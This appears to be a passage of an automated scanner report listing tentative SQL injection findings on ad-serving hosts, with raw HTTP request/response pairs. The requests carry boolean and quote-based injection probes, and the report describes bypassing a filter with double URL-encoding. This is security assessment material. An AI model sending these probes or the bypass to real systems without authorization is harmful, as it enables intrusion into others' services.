'<A HREF="http://ad.amgdgt.com/ads/?t=c&s=AAAAAQAUCuHqA1IVXQFhIjgDP1QN0ssCPz5nZW8sdXNhLHQsMTMwMzA4ODcyODQxMixjbGt1cmwsaHR0cDovL2FkLmRvdWJsZWNsaWNrLm5ldC9qdW1wL041NTMuMTI4Mzg4LkFEQ09OSU9OTUVESUFHUk9VUC9CNTAzOTk5NS4xMDthYnI9IWllNDthYnI9IWllNTtzej0xNjB4NjAwO3BjPVtUUEFTX0lEXTtvcmQ9MjcxNzg0MTU_LGMsMzIxNjExLHBjLDc2Mjg5LGFjLDE1MTM1NCxvLE4wLVMwLGwsNTM5ODQscGNsaWNrLGh0dHA6Ly9hZC5hZnkxMS5uZXQvYWQ_Yz1QdnpCM3E1NHVVMjJ6N2lKcWdld1RqZ1RENHlKZjdtVVFrZVVGeFo3VWpmOGtWdWllTHpnZTlGalpnT0hmaTVsWENZbkIwYTVXamQxb1VtSUZDUXJjdjNnK0ZNR0w0dVRXSGtPQ2ZLMEExZz0hJjExMjg4MzkyOCcgb3IgMT0xLS0gPTEK&j=">\n'+
'<IMG SRC="http://ad.doubleclick.net/ad/N553.128388.ADCONIONMEDIAGROUP/B5039995.10;abr=!ie4;abr=!ie5;sz=160x600;pc=[TPAS_ID];ord=27178415?" BORDER=0 WIDTH=160 HEIGHT=600 ALT="Advertisement"></A>\n'+
'</NOSCRIPT>\n'+
'</IFRAME><img src="http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=76289&c5=151354&c6=&cv=1.3&cj=1&rn=2115406896" s
...[SNIP]...

Request 2

GET /ads/?t=i&f=j&p=5958&pl=bfacb5d2&rnd=35958255594596268&clkurl=http%3a%2f%2fad.afy11.net%2fad%3fc%3dPvzB3q54uU22z7iJqgewTjgTD4yJf7mUQkeUFxZ7Ujf8kVuieLzge9FjZgOHfi5lXCYnB0a5Wjd1oUmIFCQrcv3g%2bFMGL4uTWHkOCfK0A1g%3d!&112883928'%20or%201%3d2--%20=1 HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/martindale.lawyer.locator.dart/ll_cpm_skyscraper;sz=160x600;ord=6949645150452853000?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: ID=AAAAAQAUTv4f.4AvYNPTpLkaenGPTHc02R4AAKsTJuN7gksypS.cOSoSGLwAAAEvZiQOFg--; Domain=.amgdgt.com; Expires=Thu, 15-Apr-2021 01:05:29 GMT; Path=/
Set-Cookie: UA=AAAAAQAUq2Z2XwOQwbbOy0ZJvKPLhf0xgaYDA3gBY2BgYGRg8rdiYHnhzcCoxcjAcOkBAwMDJ1BYP02FTwzIBgPf1fUglQwsIYwgCiwpDpECABl8Bzo-; Domain=.amgdgt.com; Expires=Wed, 18-May-2011 01:05:29 GMT; Path=/
Set-Cookie: LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; Domain=.amgdgt.com; Expires=Wed, 18-May-2011 01:05:29 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 2995
Date: Mon, 18 Apr 2011 01:05:29 GMT

_321611_amg_acamp_id=151354;
_321611_amg_pcamp_id=76289;
_321611_amg_location_id=53984;
_321611_amg_creative_id=321611;
_321611_amg_loaded=true;
var _amg_321611_content='<script type="text/javascript"
...[SNIP]...
<IFRAME SRC="http://ad.doubleclick.net/adi/N553.128388.ADCONIONMEDIAGROUP/B5039995.10;sz=160x600;pc=[TPAS_ID];click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUxMa3f.OWSFo0XK_qzSi0OWqnzqpnZW8sdXNhLHQsMTMwMzA4ODcyOTYyMyxjLDMyMTYxMSxwYyw3NjI4OSxhYywxNTEzNTQsbyxOMC1TMCxsLDUzOTg0LHBjbGljayxodHRwOi8vYWQuYWZ5MTEubmV0L2FkP2M9UHZ6QjNxNTR1VTIyejdpSnFnZXdUamdURDR5SmY3bVVRa2VVRnhaN1VqZjhrVnVpZUx6Z2U5RmpaZ09IZmk1bFhDWW5CMGE1V2pkMW9VbUlGQ1FyY3YzZytGTUdMNHVUV0hrT0NmSzBBMWc9ISYxMTI4ODM5MjgnIG9yIDE9Mi0tID0xCg--/clkurl=;ord=1734797646?" WIDTH=160 HEIGHT=600 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n'+
'<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N553.128388.ADCONIONMEDIAGROUP/B5039995.10;abr=!ie;sz=160x600;pc=[TPAS_ID];click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUxMa3f.OWSFo0XK_qzSi0OWqnzqpnZW8sdXNhLHQsMTMwMzA4ODcyOTYyMyxjLDMyMTYxMSxwYyw3NjI4OSxhYywxNTEzNTQsbyxOMC1TMCxsLDUzOTg0LHBjbGljayxodHRwOi8vYWQuYWZ5MTEubmV0L2FkP2M9UHZ6QjNxNTR1VTIyejdpSnFnZXdUamdURDR5SmY3bVVRa2VVRnhaN1VqZjhrVnVpZUx6Z2U5RmpaZ09IZmk1bFhDWW5CMGE1V2pkMW9VbUlGQ1FyY3YzZytGTUdMNHVUV0hrT0NmSzBBMWc9ISYxMTI4ODM5MjgnIG9yIDE9Mi0tID0xCg--/clkurl=;ord=1734797646?">\n'+
'</SCRIPT>\n'+
'<NOSCRIPT>\n'+
'<A HREF="http://ad.amgdgt.com/ads/?t=c&s=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-&j=">\n'+
'<IMG SRC="http://ad.doubleclick.net/ad/N553.128388.ADCONIONMEDIAGROUP/B5039995.10;abr=!ie4;abr=!ie5;sz=160x600;pc=[TPAS_ID];ord=1734797646?" BORDER=0 WIDTH=160 HEIGHT=600 ALT="Advertisement"></A>\n'+
'</NOSCRIPT>\n'+
'</IFRAME><img src="http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=76289&c5=151354&c6=&cv=1.3&cj=1&rn=178
...[SNIP]...

1.2. http://ad.doubleclick.net/adi/martindale.ll.stateresults.dart/ [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adi/martindale.ll.stateresults.dart/

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payloads 10164584'%20or%201%3d1--%20 and 10164584'%20or%201%3d2--%20 were each submitted in the User-Agent HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adi/martindale.ll.stateresults.dart/;sz=468x60;pa=;country=65;ord=717285;? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.martindale.com/all/c-england/all-lawyers.htm?n=4294962592&dv=add|City^Birmingham&c=D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.1610164584'%20or%201%3d1--%20
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 21 Apr 2011 05:25:10 GMT
Server: gfp-be
Cache-Control: private, x-gzip-ok=""
Content-Length: 1527
X-XSS-Protection: 1; mode=block

<html><head><script></script></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><div id="srBorder" style="width: 583px; height: 50px; background-color: #FFFFFF; border-color: #
...[SNIP]...
<a id="srLink" href="http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBJ2zPtr-vTeLZKsH7lQfCq5GXDPuh3Y4CAAAAEAEgADgAWJvw25EmYMkGggEXY2EtcHViLTAwNDk0NDUyNzA3NjU5NTSyARJ3d3cubWFydGluZGFsZS5jb226AQk0Njh4NjBfYXPIAQnaAWNodHRwOi8vd3d3Lm1hcnRpbmRhbGUuY29tL2FsbC9jLWVuZ2xhbmQvYWxsLWxhd3llcnMuaHRtP249NDI5NDk2MjU5MiZkdj1hZGQlN0NDaXR5JTVFQmlybWluZ2hhbSZjPUTAAgLgAgDqAiQzMDc4L21hcnRpbmRhbGUubGwuc3RhdGVyZXN1bHRzLmRhcnT4AvDRHpAD0AWYA-ADqAMB0ASQTuAEAQ%26num%3D0%26sig%3DAGiWqtx6C5m65EkogUqVZwlEh59IShH2ag%26client%3Dca-pub-0049445270765954%26adurl%3Dhttp://www.mhur.com" style="color: #006699; text-decoration: none;" onmouseover="this.style.color='#817156';" onmouseout="this.style.color='#006699';" target="_blank"><font id="srTitle" style="font-family: Verdana; font-size: 11px; font-weight: bold; text-decoration: underline;">Showcase Your Peer Review Rating With Peer Review Rating Acknowledgements</font><br><font id="srText" style="font-family: Verdana; font-size: 10px; color: #333333; text-decoration: none;">LexisNexis Martindale-Hubbell knows the success of your firm depends on how your clients perceive your skills and ethical standards. Showcase expertise while giving back to the legal community.</font></a></div></div></body></html>

Request 2

GET /adi/martindale.ll.stateresults.dart/;sz=468x60;pa=;country=65;ord=717285;? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.martindale.com/all/c-england/all-lawyers.htm?n=4294962592&dv=add|City^Birmingham&c=D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.1610164584'%20or%201%3d2--%20
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 21 Apr 2011 05:25:11 GMT
Server: gfp-be
Cache-Control: private, x-gzip-ok=""
Content-Length: 1498
X-XSS-Protection: 1; mode=block

<html><head><script></script></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><div id="srBorder" style="width: 583px; height: 50px; background-color: #FFFFFF; border-color: #
...[SNIP]...
<a id="srLink" href="http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBz-kEt7-vTeDjLIfPlQe25OSsDIug3Y4CAAAAEAEgADgAWKPg25EmYMkGggEXY2EtcHViLTAwNDk0NDUyNzA3NjU5NTSyARJ3d3cubWFydGluZGFsZS5jb226AQk0Njh4NjBfYXPIAQnaAWNodHRwOi8vd3d3Lm1hcnRpbmRhbGUuY29tL2FsbC9jLWVuZ2xhbmQvYWxsLWxhd3llcnMuaHRtP249NDI5NDk2MjU5MiZkdj1hZGQlN0NDaXR5JTVFQmlybWluZ2hhbSZjPUTAAgLgAgDqAiQzMDc4L21hcnRpbmRhbGUubGwuc3RhdGVyZXN1bHRzLmRhcnT4AvDRHpAD0AWYA-ADqAMB0ASQTuAEAQ%26num%3D0%26sig%3DAGiWqtwn2J4wUhTJGnC21zshwjSfjr51yg%26client%3Dca-pub-0049445270765954%26adurl%3Dhttp://www.martindale-hubbell.co.uk/premier-partners" style="color: #006699; text-decoration: none;" onmouseover="this.style.color='#817156';" onmouseout="this.style.color='#006699';" target="_blank"><font id="srTitle" style="font-family: Verdana; font-size: 11px; font-weight: bold; text-decoration: underline;">Climber. Leader. Lawyer.</font><br><font id="srText" style="font-family: Verdana; font-size: 10px; color: #333333; text-decoration: none;">Premier Partner Profiles: A new service from LexisNexis that provides insights into premier partners' current role, formative experiences, management style and industry experience.</font></a></div></div></body></html>

1.3. http://googleads.g.doubleclick.net/pagead/ads [id cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The id cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the id cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the id cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303152345&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fdork%2Fxss%2Fxss-dork-cross-site-scripting-msnwhitepagescom.html&dt=1303134345412&shv=r20110406&jsv=r20110415&saldr=1&correlator=1303134345434&frm=0&adk=1607234649&ga_vid=1261559504.1303134345&ga_sid=1303134345&ga_hid=1029345448&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1295&bih=1003&eid=33895130&fu=0&ifi=1&dtd=47&xpc=DSN8tnnlAu&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u%2527

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Set-Cookie: test_cookie=CheckForPermission; expires=Thu, 21-Apr-2011 09:13:25 GMT; path=/; domain=.doubleclick.net
X-Content-Type-Options: nosniff
Date: Thu, 21 Apr 2011 08:58:25 GMT
Server: cafe
Cache-Control: private
Content-Length: 12241
X-XSS-Protection: 1; mode=block
Expires: Thu, 21 Apr 2011 08:58:25 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
y94c3MtZG9yay1jcm9zcy1zaXRlLXNjcmlwdGluZy1tc253aGl0ZXBhZ2VzY29tLmh0bWyoAwHIAxfoA90F6AOKA-gD4gXoA7oC9QMCAADE&num=2&sig=AGiWqtwCyXCJCKefmS-gRlsaaPdNT_ADpg&client=ca-pub-4063878933780912&adurl=http://www.errorteck.com" id=aw1 onclick="ha('aw1')" onfocus="ss('','aw1')" onmousedown="st('aw1')" onmouseover="return ss('','aw1')" target=_top title="www.ErrorTeck.com">
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303152345&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fdork%2Fxss%2Fxss-dork-cross-site-scripting-msnwhitepagescom.html&dt=1303134345412&shv=r20110406&jsv=r20110415&saldr=1&correlator=1303134345434&frm=0&adk=1607234649&ga_vid=1261559504.1303134345&ga_sid=1303134345&ga_hid=1029345448&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1295&bih=1003&eid=33895130&fu=0&ifi=1&dtd=47&xpc=DSN8tnnlAu&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u%2527%2527

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Set-Cookie: test_cookie=CheckForPermission; expires=Thu, 21-Apr-2011 09:13:26 GMT; path=/; domain=.doubleclick.net
X-Content-Type-Options: nosniff
Date: Thu, 21 Apr 2011 08:58:26 GMT
Server: cafe
Cache-Control: private
Content-Length: 12459
X-XSS-Protection: 1; mode=block
Expires: Thu, 21 Apr 2011 08:58:26 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...

1.4. http://googleads.g.doubleclick.net/pagead/ads [lmt parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The lmt parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the lmt parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303152345'&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fdork%2Fxss%2Fxss-dork-cross-site-scripting-msnwhitepagescom.html&dt=1303134345412&shv=r20110406&jsv=r20110415&saldr=1&correlator=1303134345434&frm=0&adk=1607234649&ga_vid=1261559504.1303134345&ga_sid=1303134345&ga_hid=1029345448&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1295&bih=1003&eid=33895130&fu=0&ifi=1&dtd=47&xpc=DSN8tnnlAu&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 21 Apr 2011 08:25:10 GMT
Server: cafe
Cache-Control: private
Content-Length: 12408
X-XSS-Protection: 1; mode=block

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
y94c3MtZG9yay1jcm9zcy1zaXRlLXNjcmlwdGluZy1tc253aGl0ZXBhZ2VzY29tLmh0bWyoAwHIAxfoA90F6AOKA-gD4gXoA7oC9QMCAADE&num=2&sig=AGiWqtzQcv5MI4LKk3PKl3x-4gLOFh4J8Q&client=ca-pub-4063878933780912&adurl=http://www.errorteck.com" id=aw1 onclick="ha('aw1')" onfocus="ss('','aw1')" onmousedown="st('aw1')" onmouseover="return ss('','aw1')" target=_top title="www.ErrorTeck.com">
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303152345''&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fdork%2Fxss%2Fxss-dork-cross-site-scripting-msnwhitepagescom.html&dt=1303134345412&shv=r20110406&jsv=r20110415&saldr=1&correlator=1303134345434&frm=0&adk=1607234649&ga_vid=1261559504.1303134345&ga_sid=1303134345&ga_hid=1029345448&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1295&bih=1003&eid=33895130&fu=0&ifi=1&dtd=47&xpc=DSN8tnnlAu&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 21 Apr 2011 08:25:12 GMT
Server: cafe
Cache-Control: private
Content-Length: 12343
X-XSS-Protection: 1; mode=block

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...

1.5. http://googleads.g.doubleclick.net/pagead/ads [output parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The output parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the output parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the output request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /pagead/ads?client=ca-pub-4063878933780912&output=html%2527&h=90&slotname=2510184792&w=728&lmt=1303152345&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fdork%2Fxss%2Fxss-dork-cross-site-scripting-msnwhitepagescom.html&dt=1303134345412&shv=r20110406&jsv=r20110415&saldr=1&correlator=1303134345434&frm=0&adk=1607234649&ga_vid=1261559504.1303134345&ga_sid=1303134345&ga_hid=1029345448&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1295&bih=1003&eid=33895130&fu=0&ifi=1&dtd=47&xpc=DSN8tnnlAu&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 21 Apr 2011 08:21:52 GMT
Server: cafe
Cache-Control: private
Content-Length: 12179
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#0000ff}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
y94c3MtZG9yay1jcm9zcy1zaXRlLXNjcmlwdGluZy1tc253aGl0ZXBhZ2VzY29tLmh0bWyoAwHIAxfoA90F6AOKA-gD4gXoA7oC9QMCAADE&num=3&sig=AGiWqtwZih6lgXFEFnRXARIl-Lzi2lc2HQ&client=ca-pub-4063878933780912&adurl=http://www.errorteck.com" id=aw2 onclick="ha('aw2')" onfocus="ss('','aw2')" onmousedown="st('aw2')" onmouseover="return ss('','aw2')" target=_top title="www.ErrorTeck.com">
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-4063878933780912&output=html%2527%2527&h=90&slotname=2510184792&w=728&lmt=1303152345&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fdork%2Fxss%2Fxss-dork-cross-site-scripting-msnwhitepagescom.html&dt=1303134345412&shv=r20110406&jsv=r20110415&saldr=1&correlator=1303134345434&frm=0&adk=1607234649&ga_vid=1261559504.1303134345&ga_sid=1303134345&ga_hid=1029345448&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1295&bih=1003&eid=33895130&fu=0&ifi=1&dtd=47&xpc=DSN8tnnlAu&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 21 Apr 2011 08:21:53 GMT
Server: cafe
Cache-Control: private
Content-Length: 1470
X-XSS-Protection: 1; mode=block

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><iframe src="http://view.atdmt.com/MRT/iview/302482152/direct;wi.728;hi.90/01/519758469?click=http://googleads.g.
...[SNIP]...

1.6. http://googleads.g.doubleclick.net/pagead/ads [u_cd parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The u_cd parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the u_cd parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

